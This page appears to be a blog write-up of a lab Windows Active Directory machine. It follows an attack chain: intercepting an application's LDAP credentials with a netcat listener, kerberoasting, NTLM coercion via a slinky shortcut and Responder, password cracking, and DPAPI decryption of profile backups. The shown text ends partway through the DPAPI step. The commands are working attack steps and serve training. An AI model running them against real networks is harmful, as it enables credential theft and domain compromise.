<!DOCTYPE html><html lang="en" data-theme="dark"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>City Council (Windows Medium) | SidePieceVillage</title><meta name="author" content="Jay"><meta name="copyright" content="Jay"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#0d0d0d"><meta name="description" content=" Starting with just an open web server, I harvested potential users from the City Council portal using a quick curl | html2text command. The real..."><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "City Council (Windows Medium)",
  "url": "https://d34db33fb04h.github.io/2026/06/10/CityCouncil/",
  "image": "https://d34db33fb04h.github.io/img/cc.png",
  "datePublished": "2026-06-10T16:00:55.000Z",
  "dateModified": "2026-06-11T13:59:14.395Z",
  "author": [
    {
      "@type": "Person",
      "name": "Jay",
      "url": "https://d34db33fb04h.github.io/"
    }
  ]
}</script><link rel="shortcut icon" href="/img/j-neon-oval.png"><link rel="canonical" href="https://d34db33fb04h.github.io/2026/06/10/CityCouncil/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"top_n_per_article":1,"unescape":false,"languages":{"hits_empty":"No results found for: ${query}","hits_stats":"${hits} articles found"}},
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: 'Copy Successful',
    error: 'Copy Failed',
    noSupport: 'Browser Not Supported'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just now',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: 'Load More'
  },
  isPhotoFigcaption: true,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: true,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'City Council (Windows Medium)',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><script>window.paceOptions = {
  restartOnPushState: false
}

btf.addGlobalFn('pjaxSend', () => {
  Pace.restart()
}, 'pace_restart')

</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js/themes/blue/pace-theme-minimal.min.css"/><script src="https://cdn.jsdelivr.net/npm/pace-js/pace.min.js"></script><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="/img/hacking-crook.gif" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">24</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">62</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/whoami/"><i class="fa-fw fas fa-user"></i><span> whoami</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> Categories</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/categories/htb/"><i class="fa-fw fa-solid fa-cube"></i><span> HTB</span></a></li><li><a class="site-page child" href="/categories/vl/"><i class="fa-fw fas fa-building"></i><span> Vunlab</span></a></li><li><a class="site-page child" href="/categories/hacksmarter/"><i class="fa-fw fa-solid fa-computer"></i><span> HackSmarter</span></a></li></ul></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> Nav</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></li></ul></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg fixed" id="page-header" style="background-image: url(/img/n8.jpg);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><img class="site-icon" src="/img/j-neon-oval.png" alt="Logo"><span class="site-name">SidePieceVillage</span></a><a class="nav-page-title" href="/"><span class="site-name">City Council (Windows Medium)</span></a></span><div id="menus"><div id="search-button"><span class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> Search</span></span></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/whoami/"><i class="fa-fw fas fa-user"></i><span> whoami</span></a></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> Categories</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/categories/htb/"><i class="fa-fw fa-solid fa-cube"></i><span> HTB</span></a></li><li><a class="site-page child" href="/categories/vl/"><i class="fa-fw fas fa-building"></i><span> Vunlab</span></a></li><li><a class="site-page child" href="/categories/hacksmarter/"><i class="fa-fw fa-solid fa-computer"></i><span> HackSmarter</span></a></li></ul></div><div class="menus_item"><span class="site-page group"><i class="fa-fw fas fa-list"></i><span> Nav</span><i class="fas fa-chevron-down"></i></span><ul class="menus_item_child"><li><a class="site-page child" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></li></ul></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">City Council (Windows Medium)</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2026-06-10T16:00:55.000Z" title="Created 2026-06-10 11:00:55">2026-06-10</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2026-06-11T13:59:14.395Z" title="Updated 2026-06-11 08:59:14">2026-06-11</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/hacksmarter/">hacksmarter</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><p><img src="/img/cc.png"></p>
<p>Starting with just an open web server, I harvested potential users from the City Council portal using a quick curl | html2text command. The real breakthrough came when I downloaded a .bin application from the site—it was authenticating to the domain controller right in front of me. By spoofing the DC’s hostname locally and listening on port 389, I captured credentials for svc_services_portal.</p>
<p>From there, it was classic AD attacks: kerberoasting got me clerk.john, who had write access to an Uploads share. Deploying the slinky module triggered NTLM authentication from jon.peters, whose cracked credentials revealed GenericWrite privileges over three users.</p>
<p>Targeted kerberoasting of those users cracked passwords for nina.soto, who could read the Backups share. Inside .wim profile backups, I found DPAPI-protected credentials—decrypted to reveal emma.hayes with powerful ACL controls.</p>
<p>Critical clue: Buried inside sam.brooks profile backup was an email (message_sam.eml) warning that web_admin had been moved to the Quarantine OU because the web server had ASP.NET enabled with file uploads allowed—a huge hint for the final foothold.</p>
<p>Using emma.hayes, I moved the quarantined web_admin account into the CityOps OU, reset passwords, and pivoted through sam.brooks to get an initial shell. The final escalation? Just like the email warned—uploading a webshell as web_admin gave me SeImpersonate privileges. GodPotato to SYSTEM, new admin user, game over. </p>
<h1 id="Initial-Scan"><a href="#Initial-Scan" class="headerlink" title="Initial Scan"></a>Initial Scan</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">PORT      STATE SERVICE          REASON</span><br><span class="line">53/tcp    open  domain           syn-ack</span><br><span class="line">80/tcp    open  http             syn-ack</span><br><span class="line">88/tcp    open  kerberos-sec     syn-ack</span><br><span class="line">135/tcp   open  msrpc            syn-ack</span><br><span class="line">139/tcp   open  netbios-ssn      syn-ack</span><br><span class="line">389/tcp   open  ldap             syn-ack</span><br><span class="line">445/tcp   open  microsoft-ds     syn-ack</span><br><span class="line">464/tcp   open  kpasswd5         syn-ack</span><br><span class="line">593/tcp   open  http-rpc-epmap   syn-ack</span><br><span class="line">636/tcp   open  ldapssl          syn-ack</span><br><span class="line">3268/tcp  open  globalcatLDAP    syn-ack</span><br><span class="line">3269/tcp  open  globalcatLDAPssl syn-ack</span><br><span class="line">3389/tcp  open  ms-wbt-server    syn-ack</span><br><span class="line">5985/tcp  open  wsman            syn-ack</span><br></pre></td></tr></table></figure>

<p>Active Directory box with what looks like port 80 running as well. Let check out whats on 80 first.</p>
<h1 id="Running-for-Council"><a href="#Running-for-Council" class="headerlink" title="Running for Council"></a>Running for Council</h1><p><img src="/img/cityc1.png"></p>
<p>Upon scrolling down we see some possible users. We can grab these with a little quick command I like.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ curl -s http://city.local | html2text | grep <span class="string">&#x27;@&#x27;</span> | awk -F<span class="string">&#x27;@&#x27;</span> <span class="string">&#x27;&#123;print $1&#125;&#x27;</span> &gt; users.lst</span><br></pre></td></tr></table></figure>

<p>This will give us a user list we can work with.</p>
<p><em>For background work, I through up <strong>cewl</strong> to create a wordlist for me.(P.S. Didn’t help)</em></p>
<p><img src="/img/cityc2.png"></p>
<p>Looking more on the site, there was some binaires we could download on the documents and forms page found at the bottom of the page. We can download the <strong>bin</strong> file and see what this does.</p>
<h1 id="The-Stone-Portal"><a href="#The-Stone-Portal" class="headerlink" title="The Stone Portal"></a>The Stone Portal</h1><p><img src="/img/cityc3.png"></p>
<p>After starting up, we see a Application Status log and when we submit an application we see some output in the terminal.</p>
<p><img src="/img/cityc4.png"></p>
<p>This looks juicy!!! It’s an application we downloaded and is now running on our machine. It’s reaching out to authenticate against, what I assume is the server, DC-CC.city.local. Perhaps we can intercept those credentials. </p>
<p><img src="/img/goldeneye-boris.gif"></p>
<h1 id="Meet-in-the-Middle"><a href="#Meet-in-the-Middle" class="headerlink" title="Meet in the Middle"></a>Meet in the Middle</h1><p>First, lets see what happens when we set our IP to <em>DC-CC.city.local</em>.<em>(localhost works too)</em></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ nano /etc/hosts</span><br><span class="line"></span><br><span class="line">127.0.0.1 localhost DC-CC.city.local</span><br><span class="line">127.0.1.1 konoha</span><br></pre></td></tr></table></figure>

<p>Then we can setup <em>nc</em> and see if we can capture credentials when we submit an application.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ nc -lvnp 389</span><br><span class="line">listening on [any] 389 ...</span><br><span class="line">connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 32962</span><br><span class="line">USER=svc_services_portal PASS=&lt;SNIP&gt; DOMAIN=city.local SERVICE=Building Permit Request</span><br></pre></td></tr></table></figure>

<p><img src="/img/yes.gif"></p>
<h1 id="Bloodhound-Obtained"><a href="#Bloodhound-Obtained" class="headerlink" title="Bloodhound Obtained"></a>Bloodhound Obtained</h1><p>With some credentials we can now get some users and bloodhound. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ rusthound -z -d city.local -u svc_services_portal -p &lt;SNIP&gt; -i 10.1.4.152</span><br></pre></td></tr></table></figure>

<p>Bloodhound showed nothing but we have some users.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ridenum city.local 500 5000 svc_services_portal &lt;SNIP&gt;</span><br></pre></td></tr></table></figure>
<p>With <em>nxc</em>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nxc smb city.local -u svc_services_portal -p &lt;SNIP&gt; --rid-brute</span><br></pre></td></tr></table></figure>

<h1 id="Kerberos-Kills"><a href="#Kerberos-Kills" class="headerlink" title="Kerberos Kills"></a>Kerberos Kills</h1><p>With this list of users, we can try kerberoasting and asreproasting. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ GetUserSPNs.py <span class="string">&#x27;city.local/svc_services_portal:&lt;SNIP&gt;&#x27;</span> -usersfile users.lst -output SOMEHASHES</span><br></pre></td></tr></table></figure>

<p>Then we can use JtR to crack these. This gets us <em>clerk.john</em>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ john --wordlist=/usr/share/wordlists/rockyou.txt SOMEHASHES</span><br></pre></td></tr></table></figure>

<p><img src="/img/clerk.gif"></p>
<h1 id="Sharing-is-Caring"><a href="#Sharing-is-Caring" class="headerlink" title="Sharing is Caring"></a>Sharing is Caring</h1><p>With some new creds we can check to see whats available to use as bloodhound showed us nothing for <em>clerk.john</em>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ nxc smb city.local -u clerk.john -p &lt;SNIP&gt; --shares</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            [+] city.local\clerk.john:clerkhill</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            [*] Enumerated shares</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            Share           Permissions     Remark</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            -----           -----------     ------</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            Backups</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            C$                              Default share</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            NETLOGON        READ            Logon server share</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            SYSVOL          READ            Logon server share</span><br><span class="line">SMB         10.1.4.152      445    DC-CC            Uploads         READ,WRITE</span><br></pre></td></tr></table></figure>

<p>So we have <em>Uploads</em> available to use. After reading the <em>WriteAccess_Jon.Peters_DC-CC-Uploads.eml</em> we find out that there is a shared folder connected and does give warning that the share uses NTLM authentication. We can leverage this in our favor.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ nxc smb city.local -u clerk.john -p &lt;SNIP&gt; -M slinky -o SERVER=10.200.38.163 NAME=HAPPYTIME</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ python3 /opt/Responder/Responder.py -I tun0 -w</span><br><span class="line">                                         __</span><br><span class="line">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</span><br><span class="line">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</span><br><span class="line">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</span><br><span class="line">                   |__|</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;SNIP&gt;</span><br><span class="line"></span><br><span class="line">[*] Version: Responder 3.2.2.0</span><br><span class="line">[*] Author: Laurent Gaffie, &lt;lgaffie@secorizon.com&gt;</span><br><span class="line"></span><br><span class="line">[+] Listening <span class="keyword">for</span> events...</span><br><span class="line"></span><br><span class="line">[SMB] NTLMv2-SSP Client   : 10.1.4.152</span><br><span class="line">[SMB] NTLMv2-SSP Username : CITY\jon.peters</span><br><span class="line">[SMB] NTLMv2-SSP Hash     : jon.peters::CITY:85396ea2f7e1c4e0:&lt;SNIP&gt;</span><br></pre></td></tr></table></figure>

<p>We capture <em>jon.peters</em> ntlmv2 hash we can can attempt to crack via JtR. </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ john --wordlist=/usr/share/wordlists/rockyou.txt jon.peters.ntlmv2</span><br></pre></td></tr></table></figure>

<p>This does crack and give us another set of credentials. Looking at bloodhound we have <em>GenericWrite</em> over 3 users.</p>
<p><img src="/img/cityc5.png"></p>
<h1 id="Your-Toast"><a href="#Your-Toast" class="headerlink" title="Your Toast"></a>Your Toast</h1><p><img src="/img/tom-and-jerry-mafia.gif"></p>
<p>We can <em>targetedKerberoast</em> these users and see if these hashes crack.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 /opt/tools/targetedKerberoast/targetedKerberoast.py -D city.local -d city.local --dc-host city.local --dc-ip 10.1.4.152 -u jon.peters -p &lt;SNIP&gt; -o GIVEMEHASHES</span><br></pre></td></tr></table></figure>

<p>Using JtR gets us passwords for <em>nina.soto</em> and <em>maria.clerk</em>. Neither have anything interesting in bloodhound, but shares show that <em>nina.soto</em> has access to the <strong>Backups</strong> share. Lets look in it.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -u nina.soto -p &lt;SNIP&gt; -d city.local -H 10.1.4.152 -r Backups --depth 7</span><br><span class="line"></span><br><span class="line">    ________  ___      ___  _______   ___      ___       __         _______</span><br><span class="line">   /<span class="string">&quot;       )|&quot;</span>  \    /<span class="string">&quot;  ||   _  &quot;</span>\ |<span class="string">&quot;  \    /&quot;</span>  |     /<span class="string">&quot;&quot;</span>\       |   __ <span class="string">&quot;\</span></span><br><span class="line"><span class="string">  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)</span></span><br><span class="line"><span class="string">   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /&#x27; /\  \     |:  ____/</span></span><br><span class="line"><span class="string">    __/  \   |: \.        |(|  _  \  |: \.        |  //  __&#x27;  \    (|  /</span></span><br><span class="line"><span class="string">   /&quot;</span> \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \</span><br><span class="line">  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)</span><br><span class="line">-----------------------------------------------------------------------------</span><br><span class="line">SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com</span><br><span class="line">                     https://github.com/ShawnDEvans/smbmap</span><br><span class="line">&lt;SNIP&gt;</span><br><span class="line"></span><br><span class="line">[+] IP: 10.1.4.152:445	Name: DC-CC.city.local    	Status: Authenticated</span><br><span class="line">	Disk                                                  	Permissions	Comment</span><br><span class="line">	----                                                  	-----------	-------</span><br><span class="line">	ADMIN$                                            	NO ACCESS	Remote Admin</span><br><span class="line">	Backups                                           	READ ONLY	</span><br><span class="line">	./Backups</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 12:55:14 2025	.</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 12:55:14 2025	..</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 12:55:14 2025	Documents Backup</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 14:55:27 2025	UserProfileBackups</span><br><span class="line">	./Backups//Documents Backup</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 12:55:14 2025	.</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 12:55:14 2025	..</span><br><span class="line">	fr--r--r--          2347395 Thu Oct 30 12:54:12 2025	City_Council_Official_Records.pdf</span><br><span class="line">	fr--r--r--              829 Fri Feb  6 04:55:19 2026	Staff_Contacts.txt</span><br><span class="line">	./Backups//UserProfileBackups</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 14:55:27 2025	.</span><br><span class="line">	dr--r--r--                0 Thu Oct 30 14:55:27 2025	..</span><br><span class="line">	fr--r--r--         69883158 Thu Oct 30 12:54:12 2025	clerk.john_ProfileBackup_0729.wim</span><br><span class="line">	fr--r--r--           130326 Thu Oct 30 14:55:27 2025	sam.brooks_ProfileBackup_0728.wim</span><br><span class="line">	C$                                                	NO ACCESS	Default share</span><br><span class="line">	IPC$                                              	READ ONLY	Remote IPC</span><br><span class="line">	NETLOGON                                          	READ ONLY	Logon server share</span><br><span class="line">	SYSVOL                                            	READ ONLY	Logon server share</span><br><span class="line">	Uploads                                           	NO ACCESS	</span><br><span class="line">[*] Closed 1 connections</span><br></pre></td></tr></table></figure>

<h1 id="Your-Public-Image"><a href="#Your-Public-Image" class="headerlink" title="Your Public Image"></a>Your Public Image</h1><p><img src="/img/monalisasmile.gif"></p>
<p>The <em>wim</em> images stood out so I downloaded them to my machine and took a look.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ 7z l sam.brooks_ProfileBackup_0728.wim</span><br><span class="line">&lt;SNIP&gt;</span><br><span class="line">2018-09-15 03:16:48 ....A         2494         1024  AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Windows PowerShell/Windows PowerShell.lnk</span><br><span class="line">2025-10-30 14:52:55 ....A          805          679  Desktop/message_sam.eml</span><br></pre></td></tr></table></figure>

<p>Only interesting thing I found was the <strong>message_sam.eml</strong>. I extracted just that file. Then I looked at <strong>clerk.john</strong> wim file.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ 7z l clerk.john_ProfileBackup_0729.wim</span><br><span class="line">&lt;SNIP&gt;</span><br><span class="line">2025-10-30 11:53:55 ..HSA          450          450  AppData/Roaming/Microsoft/Credentials/03128079C6E14F37F5AEBDD69E344291</span><br><span class="line">2019-03-19 00:49:51 ..HSA          148          148  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/desktop.ini</span><br><span class="line">2025-10-30 11:41:59 ...SA          800          800  AppData/Roaming/Microsoft/Crypto/Keys/de7cf8a7901d2ad13e5c67c29e5d1662_e093fd60-e31b-4f5c-8be0-519172cb04de</span><br><span class="line">2025-10-30 11:41:58 ....A         2294          955  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Google Chrome.lnk</span><br><span class="line">2019-03-19 00:43:54 ....A          352          352  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Shows Desktop.lnk</span><br><span class="line">2019-03-19 00:43:54 ....A          334          334  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Window Switcher.lnk</span><br><span class="line">2025-10-30 11:42:00 ..HS.           83           83  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/User Pinned/TaskBar/desktop.ini</span><br><span class="line">2019-03-19 00:43:54 ....A          407          407  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/User Pinned/TaskBar/File Explorer.lnk</span><br><span class="line">2019-03-19 00:43:54 ....A          407          407  AppData/Roaming/Microsoft/Windows/Start Menu/Programs/System Tools/File Explorer.lnk</span><br><span class="line">2025-10-30 11:41:57 ..HSA           24           24  AppData/Roaming/Microsoft/Protect/CREDHIST</span><br><span class="line">2025-04-07 14:13:34 ....A         2239          935  AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/User Pinned/TaskBar/Google Chrome.lnk</span><br><span class="line">2025-10-30 11:41:58 ..HSA           76           76  AppData/Roaming/Microsoft/Protect/SYNCHIST</span><br><span class="line">2025-10-30 11:41:57 ..HSA          900          900  AppData/Roaming/Microsoft/Protect/S-1-5-21-407732331-1521580060-1819249925-1103/BK-CITY</span><br><span class="line">2025-10-30 11:41:57 ..HSA           24           24  AppData/Roaming/Microsoft/Protect/S-1-5-21-407732331-1521580060-1819249925-1103/Preferred</span><br><span class="line">2025-10-30 11:41:57 ..HSA          740          740  AppData/Roaming/Microsoft/Protect/S-1-5-21-407732331-1521580060-1819249925-1103/de222e76-cb5d-418f-a1c2-7e4e9dfe29e1</span><br><span class="line">&lt;SNIP&gt;</span><br></pre></td></tr></table></figure>

<p>This held the things we need for <strong>DPAPI</strong>. We can use <em>dpapi.py</em> from impacket to achieve this.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ dpapi.py masterkey -f DPAPI/de222e76-cb5d-418f-a1c2-7e4e9dfe29e1 -sid S-1-5-21-407732331-1521580060-1819249925-1103 -password &lt;SNIP&gt;</span><br></pre></td></tr></table></figure>
